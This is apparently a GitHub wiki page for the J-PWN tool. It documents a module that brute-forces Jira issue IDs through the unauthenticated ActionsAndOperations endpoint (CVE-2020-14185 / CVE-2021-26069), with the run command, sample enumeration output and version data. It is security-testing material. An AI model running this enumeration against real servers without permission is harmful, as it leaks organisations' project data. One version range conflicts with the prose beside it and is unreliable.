CVE-2020-14185 | CVE-2021-26069

Category: [Info Disclosure | Enumeration]

Affected versions of Jira Server allow remote unauthenticated attackers to enumerate issue keys via a missing permissions check in the ActionsAndOperations resource.

module name: check_cve_2020_14185

url: {url}/rest/api/1.0/issues/{issue_id}/ActionsAndOperations

[CG] as far as i can tell these two CVEs are the same issue (CVE-2020-14185 | CVE-2021-26069)

Checking: http://JIRASERVER:8080/
+ JIRA is running on: http://JIRASERVER:8080 

JIRA Server Information:
  Base URL        : http://OTHERJIRA:8080
  Version         : 7.12.3
  Deployment Type : Server
  Build Number    : 712004
  Build Date      : 2018-10-12T00:00:00.000+0800
  Server Title    : REMOVED

[CG] You need to run this check in single module mode due to the amount of requests

Defaults for the module:

  --start_id START_ID   Start ID for issue enumeration (default: 10000)
  --end_id END_ID       End ID for issue enumeration (default: 20000)

To run the module:

python3 j-pwn.py --single http://JIRASERVER:8080 --module check_cve_2020_14185 --end_id 10200

INFO: Brute-forcing Enumeration via ActionsAndOperations Resource with threading
- Issue ID 10000 not found (HTTP 404)
- Issue ID 10060 not found (HTTP 404)
- Issue ID 10080 not found (HTTP 404)
- Issue ID 10180 not found (HTTP 404)
- Issue ID 10020 not found (HTTP 404)
- Issue ID 10100 not found (HTTP 404)
- Issue ID 10040 not found (HTTP 404)
[+] [CVE-2020-14185 | CVE-2021-26069] Vulnerable to issue enumeration via ActionsAndOperations: http://JIRASERVER:8080/rest/api/1.0/issues/10140/ActionsAndOperations

  Enumerated Operations:
    - Issue ID: 10140
    - Issue Key: AN-82
    - View Issue: 查看问题
[+] [CVE-2020-14185 | CVE-2021-26069] Vulnerable to issue enumeration via ActionsAndOperations: http://JIRASERVER:8080/rest/api/1.0/issues/10160/ActionsAndOperations

  Enumerated Operations:
    - Issue ID: 10160
    - Issue Key: AN-102
    - View Issue: 查看问题
<SNIP>

References

https://jira.atlassian.com/browse/JRASERVER-71696 [CVE-2020-14185]

Description Affected versions of Jira Server allow remote unauthenticated attackers to enumerate issue keys via a missing permissions check in the ActionsAndOperations resource.

The affected versions are before 7.13.18, from version 8.0.0 before 8.5.9, and from version 8.6.0 before version 8.12.2.

Affected versions:

version < 7.13.18
8.0.0 ≤ version < 7.13.18
8.6.0 ≤ version < 8.12.2

Fixed versions:

7.13.18
8.5.9
8.12.2

https://jira.atlassian.com/browse/JRASERVER-72010 [CVE-2021-26069]

Description Affected versions of Atlassian Jira Server and Data Center allow unauthenticated remote attackers to download temporary files and enumerate project keys via an Information Disclosure vulnerability in the /rest/api/1.0/issues/{id}/ActionsAndOperations API endpoint.

The affected versions are before version 8.5.11, from version 8.6.0 before 8.13.3, and from version 8.14.0 before 8.15.0.

Affected versions:

version < 8.5.11
8.6.0 ≤ version < 8.13.3
8.14.0 ≤ version < 8.15.0

Fixed versions:

8.5.11
8.13.3
8.15.0

CVE‐2020‐14185 | CVE‐2021‐26069 - carnal0wnage/J-PWN GitHub Wiki

CVE-2020-14185 | CVE-2021-26069

⚠️ GitHub.com Fallback ⚠️

CVE‐2020‐14185 | CVE‐2021‐26069 - carnal0wnage/J-PWN GitHub Wiki

CVE-2020-14185 | CVE-2021-26069

⚠️ **GitHub.com Fallback** ⚠️

⚠️ GitHub.com Fallback ⚠️